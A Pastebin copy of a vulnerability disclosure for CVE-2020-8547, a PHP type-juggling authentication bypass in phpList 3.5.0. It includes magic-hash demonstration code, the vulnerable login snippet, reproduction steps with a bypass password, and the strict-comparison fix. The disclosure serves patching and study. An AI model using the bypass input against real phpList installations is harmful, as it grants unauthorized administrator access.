API tools faq
paste
hadipras

phpList 3.5.0 - Authentication Bypass

hadipras
Feb 6th, 2020
997
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.97 KB | None | 0 0
raw download clone embed print report
  1. # Exploit Title: phpList 3.5.0 - Authentication Bypass
  2. # Google Dork: N/A
  3. # Date: 2020-02-03
  4. # Exploit Author: Suvadip Kar
  5. # Author Contact: https://twitter.com/spidersec
  6. # Vendor Homepage: https://www.phplist.org
  7. # Software Link: https://www.phplist.org/download-phplist/
  8. # Version: 3.5.0
  9. # Tested on: Linux
  10. # CVE : CVE-2020-8547
  11.  
  12. Background of the Vulnerability :
  13.  
  14. Php loose comparison '==' compares two operands by converting them to integers even if they are strings.
  15.  
  16. EXAMPLE CODE:
  17.  
  18. <?php
  19. var_dump(hash('sha256', 'TyNOQHUS') == '0e66298694359207596086558843543959518835691168370379069085300385');
  20. var_dump(hash('sha256', '34250003024812') == '0e66298694359207596086558843543959518835691168370379069085300385');
  21. ?>
  22.  
  23. OUTPUT:
  24.  
  25. bool(true)
  26. bool(true)
  27.  
  28. Vulnerable code:
  29.  
  30. GITHUB: https://github.com/phpList/phplist3/blob/master/public_html/lists/admin/phpListAdminAuthentication.php
  31. -----
  32. if(empty($login)||($password=="")){
  33. return array(0, s('Please enter your credentials.'));
  34. }
  35. if ($admindata['disabled']) {
  36. return array(0, s('your account has been disabled'));
  37. }
  38. if (//Password validation.
  39. !empty($passwordDB) && $encryptedPass == $passwordDB // Vulnerable because loose comparison is used
  40. )
  41. return array($admindata['id'], 'OK');
  42. else {
  43. if (!empty($GLOBALS['admin_auth_module'])) {
  44. Error(s('Admin authentication has changed, please update your admin module'),
  45. 'https://resources.phplist.com/documentation/errors/adminauthchange');
  46. return;
  47. }
  48. return array(0, s('incorrect password'));
  49.  
  50. }
  51. -------
  52.  
  53. Steps to reproduce:
  54.  
  55. 1. Set the string 'TyNOQHUS' as password for username 'admin'. Its sha256 value is 0e66298694359207596086558843543959518835691168370379069085300385.
  56.  
  57. 2. Now navigate to endpoint '/admin' and try to login with username 'admin' password 'TyNOQHUS'.
  58.  
  59. 3. User Logged in with valid password.
  60.  
  61. 4. Now logout from the application and try to login with username 'admin' password '34250003024812'.
  62.  
  63. 5. User Logged in, without valid password.
  64.  
  65. 6. Authentication bypassed because of PHP loose comparison.
  66.  
  67. FIX: This vulnerability can be fixed by using strict comparison (===) in place of loose comparison.
  68. -----
  69. if(empty($login)||($password=="")){
  70. return array(0, s('Please enter your credentials.'));
  71. }
  72. if ($admindata['disabled']) {
  73. return array(0, s('your account has been disabled'));
  74. }
  75. if (//Password validation.
  76. !empty($passwordDB) && $encryptedPass === $passwordDB // Fixed by using strict comparison '==='.
  77. )
  78. return array($admindata['id'], 'OK');
  79. else {
  80. if (!empty($GLOBALS['admin_auth_module'])) {
  81. Error(s('Admin authentication has changed, please update your admin module'),
  82. 'https://resources.phplist.com/documentation/errors/adminauthchange');
  83. return;
  84. }
  85. return array(0, s('incorrect password'));
  86.  
  87. }
  88. -------
  89.  
  90. Additional Resource: https://www.owasp.org/images/6/6b/PHPMagicTricks-TypeJuggling.pdf
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!